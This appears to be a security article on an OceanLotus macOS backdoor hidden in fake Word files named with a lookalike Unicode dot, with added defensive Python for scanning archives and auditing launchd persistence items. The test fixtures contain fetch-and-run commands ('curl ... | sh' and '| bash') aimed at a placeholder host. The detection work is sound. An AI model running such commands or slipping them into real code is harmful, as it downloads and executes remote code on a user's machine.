Malware in fake Word files
macOS backdoor malware is being distributed through malicious emails.
A backdoor gives malware (or any other unauthorized party) hidden, persistent access to a computer or a network. It is hard for an ordinary user to notice because it runs silently and is designed not to draw attention.
This particular backdoor may arrive as a Zip archive disguised as a Word document (.doc).
The file appears to have the extension ".doc", but the "dot" before "doc" is a different Unicode character that merely looks like a period. Because it is not a real period, the operating system does not treat ".doc" as the file's extension at all; only the user is fooled. It is essentially a homograph attack applied to a file name.
The fake Word file carries the Word icon as well. Setting an icon takes no effort, so making a malicious file look like a harmless document is trivial for cybercriminals.
If the file is opened, a script runs instead of a document and the Mac is infected with the backdoor. The backdoor can then bring in further malware, so the initial infection is rarely the end of it.
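The two checks a practitioner would want against such a file are: does the name contain a character that only looks like a dot, and do the file's leading bytes match the document type the name claims? The Python below, added here as an example (it is not code from the article or from the researchers' tooling), applies both to every member of a Zip archive. The confusable-dot list, the magic-byte table and the sample archive are constructed for this example and are not taken from the reported sample.

```python
"""Check whether a file that presents itself as an Office document really is one.
Added example, not code from the article or from the researchers' tooling.
Assumptions: the confusable-dot list, the magic-byte table and the sample archive
are constructed for this example and are not taken from the reported sample."""
import io
import unicodedata
import zipfile

# Non-ASCII code points that render like an ASCII '.' in most fonts (assumed list).
DOT_CONFUSABLES = {"\u2024", "\u2027", "\uff0e", "\u3002", "\ufe52", "\u00b7", "\u2219"}

# Extensions a recipient expects to be harmless documents.
DOC_EXTENSIONS = {"doc", "docx", "pdf", "rtf", "xls", "xlsx", "ppt", "pptx", "txt"}

# Leading bytes of common formats. Legacy .doc/.xls/.ppt are OLE2 compound files;
# .docx/.xlsx/.pptx are ZIP containers, so they share the ZIP magic.
MAGIC = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),
    (b"PK\x03\x04", "zip"),
    (b"%PDF", "pdf"),
    (b"{\\rtf", "rtf"),
    (b"#!", "script"),                   # shebang: shell, Python, Perl ...
    (b"\xcf\xfa\xed\xfe", "macho"),      # 64-bit little-endian Mach-O
    (b"\xca\xfe\xba\xbe", "macho-fat"),  # universal (fat) Mach-O
]
EXPECTED = {"doc": {"ole2"}, "xls": {"ole2"}, "ppt": {"ole2"}, "docx": {"zip"},
            "xlsx": {"zip"}, "pptx": {"zip"}, "pdf": {"pdf"}, "rtf": {"rtf"}}
EXECUTABLE_KINDS = {"script", "macho", "macho-fat"}


def lookalike_dots(name):
    """(offset, Unicode name) of every confusable 'dot' in a file name."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(name) if ch in DOT_CONFUSABLES]


def real_extension(name):
    """The extension the OS actually uses: only a genuine ASCII '.' counts."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def displayed_extension(name):
    """The extension a user *sees*: lookalike dots are folded to '.' before splitting."""
    folded = "".join("." if ch in DOT_CONFUSABLES else ch for ch in name)
    return real_extension(folded)


def content_type(head):
    """Classify a file by its leading bytes; 'unknown' for plain text and unlisted formats."""
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return "unknown"


def check_entry(name, head):
    """Findings for one file (empty list = name and content are consistent)."""
    findings = []
    dots = lookalike_dots(name)
    if dots:
        where = ", ".join(f"{n} at offset {i}" for i, n in dots)
        findings.append(f"lookalike dot in name ({where}); OS sees extension "
                        f"'{real_extension(name) or '<none>'}'")
    shown, kind = displayed_extension(name), content_type(head)
    if shown in DOC_EXTENSIONS and kind not in EXPECTED.get(shown, {"unknown"}):
        findings.append(f"presented as .{shown} but content is {kind}")
    if ".app/" in name or kind in EXECUTABLE_KINDS:
        findings.append("executable payload (app bundle, script or Mach-O binary)")
    return findings


def scan_zip(zip_bytes):
    """Run check_entry over every member of an archive; returns {member: findings}."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                findings = check_entry(info.filename, zf.read(info)[:16])
                if findings:
                    report[info.filename] = findings
    return report


def build_sample_archive():
    """Constructed fixture (not the real sample): a shell script named to look like
    'Invoice.doc' using ONE DOT LEADER (U+2024), plus an honest text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice\u2024doc", "#!/bin/bash\ncurl -s http://example.invalid/x | sh\n")
        zf.writestr("readme.txt", "Nothing to see here.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_zip(build_sample_archive()).items():
        print(member, "->", "; ".join(findings))
```

Note that the "Invoice" entry has no extension at all as far as the operating system is concerned, which is exactly why Gatekeeper-style "open with Word" expectations do not apply: the user double-clicks what they believe is a document and the system happily runs whatever the file actually is. Magic-byte checks are cheap and catch the mismatch regardless of which lookalike character was used.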
Consequences of an infection
The researchers who found and described this backdoor attribute it to OceanLotus (also tracked as APT32), a group whose earlier macOS backdoors are already documented.
This new OceanLotus sample collects system information and sends it to the operators. It can also download files and execute code on command. The user of the infected Mac will usually notice nothing.
You can read more about this backdoor here: Trendmicro.com.
OceanLotus can install more malware on the system: info stealers, web traffic hijackers, and so on. Malware of this kind (the Shlayer trojan comes to mind) can cause all sorts of problems while browsing the web or using online applications. It is also hard to remove because it persists aggressively: network settings, configuration profiles and files scattered across the Library folders all have to be located and removed before the machine is clean.
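The most common place for macOS malware to persist is a launchd property list in one of the LaunchAgents or LaunchDaemons folders, so "finding" the persistence usually starts there. The Python below is an added example (not code from the article or from the researchers) that lists those items and flags the traits a backdoor loader tends to have: it runs a shell interpreter with an inline command, restarts itself when killed, or carries an Apple-looking label in a third-party folder. The heuristics and the two sample plists are assumptions made for this example, not indicators from the report; it goes beyond the single case in the text by covering the general persistence mechanism.

```python
"""Enumerate launchd persistence items and flag the ones a backdoor would typically plant.
Added example, not code from the article or the researchers. The heuristics and the
sample plists are assumptions made for the example, not indicators from the report."""
import os
import plistlib
import tempfile

# Standard launchd folders. The per-user one needs no admin password, so user-level
# malware most often persists there.
LAUNCHD_DIRS = [
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
]
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "curl"}
ODD_LOCATIONS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")


def program_of(item):
    """Executable a launchd item runs: 'Program' wins, else ProgramArguments[0]."""
    if item.get("Program"):
        return item["Program"]
    args = item.get("ProgramArguments") or []
    return args[0] if args else ""


def assess(item):
    """Reasons an item deserves a closer look; empty list means nothing stood out."""
    reasons = []
    prog = program_of(item)
    args = item.get("ProgramArguments") or []
    label = item.get("Label", "")
    if not prog:
        reasons.append("no program specified")
    if os.path.basename(prog) in INTERPRETERS:
        reasons.append(f"launches an interpreter ({os.path.basename(prog)}) instead of an app")
    if "-c" in args:
        reasons.append("runs an inline command string")
    if prog.startswith(ODD_LOCATIONS) or "/." in prog:
        reasons.append(f"program lives in an unusual or hidden location: {prog}")
    if item.get("RunAtLoad") and item.get("KeepAlive"):
        reasons.append("starts at login and is restarted whenever it exits")
    if label.startswith("com.apple."):
        # Heuristic: Apple's own agents live under /System, so verify any such label here.
        reasons.append("Apple-looking label in a third-party launchd folder")
    return reasons


def audit_launch_items(dirs=LAUNCHD_DIRS):
    """Parse every .plist in the given folders; returns [(path, label, program, reasons)]."""
    results = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for fn in sorted(os.listdir(d)):
            if not fn.endswith(".plist"):
                continue
            path = os.path.join(d, fn)
            try:
                with open(path, "rb") as fh:
                    item = plistlib.load(fh)
            except Exception as exc:  # unreadable or malformed: still list it
                results.append((path, "?", "?", [f"could not parse: {exc}"]))
                continue
            results.append((path, item.get("Label", "?"), program_of(item), assess(item)))
    return results


def make_sample_dir():
    """Constructed fixture: one ordinary agent and one that looks like a backdoor loader."""
    d = tempfile.mkdtemp()
    items = {
        "com.example.sync.plist": {
            "Label": "com.example.sync",
            "Program": "/Applications/Sync.app/Contents/MacOS/Sync",
            "RunAtLoad": True,
        },
        "com.apple.update.helper.plist": {
            "Label": "com.apple.update.helper",
            "ProgramArguments": ["/bin/bash", "-c", "curl -s http://example.invalid/p | bash"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
    }
    for fn, item in items.items():
        with open(os.path.join(d, fn), "wb") as fh:
            plistlib.dump(item, fh)
    return d


if __name__ == "__main__":
    # Scan the constructed fixture first, then the real folders on this machine (read-only).
    for path, label, prog, reasons in audit_launch_items([make_sample_dir()] + LAUNCHD_DIRS):
        print(f"{label:32} {prog}\n    " + ("; ".join(reasons) or "nothing unusual"))
```

Every flag is a heuristic, not a verdict: plenty of legitimate helpers use KeepAlive, and a handful of Apple-supplied items do appear in /Library/LaunchDaemons. The value is in producing a short list to verify by hand, and in noting the program path of each item so the binary it launches can be removed together with the plist.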
How to keep your Mac safe
OceanLotus itself is not new, but a fresh iteration can initially slip past even good antivirus engines. Once it is detected, engines tend to label it with generic names such as Dropper, Trojan, BackDoor, Bash.Agent and Shell.Agent, or specifically as OceanLotus.
The VirusTotal scan results for the fake Word file found by the researchers are here: Virustotal.com.
OceanLotus gives us a reminder to stay vigilant and to be aware of malware threats:
- Use good antivirus software and keep it up to date. Detection of a new sample typically goes from zero to widespread within hours or days as vendors add signatures, which is why keeping your anti-malware definitions current matters.
- Be suspicious of unprompted documents and other files arriving by email. Email remains one of the most common infection vectors.
- Ask for advice. Almost any file type can carry malicious code: documents, archives, even images. If you receive an unexpected email that asks you to download and open a file, contact your administrator and ask whether it is safe before opening it.
- If your Mac has been infected with malware, shut it down or at least disconnect it from the internet. That stops the backdoor from reaching its command-and-control server to exfiltrate data or download more malware. It does not remove the backdoor, though; the persistence items and files it planted still have to be found and removed before the machine goes back online.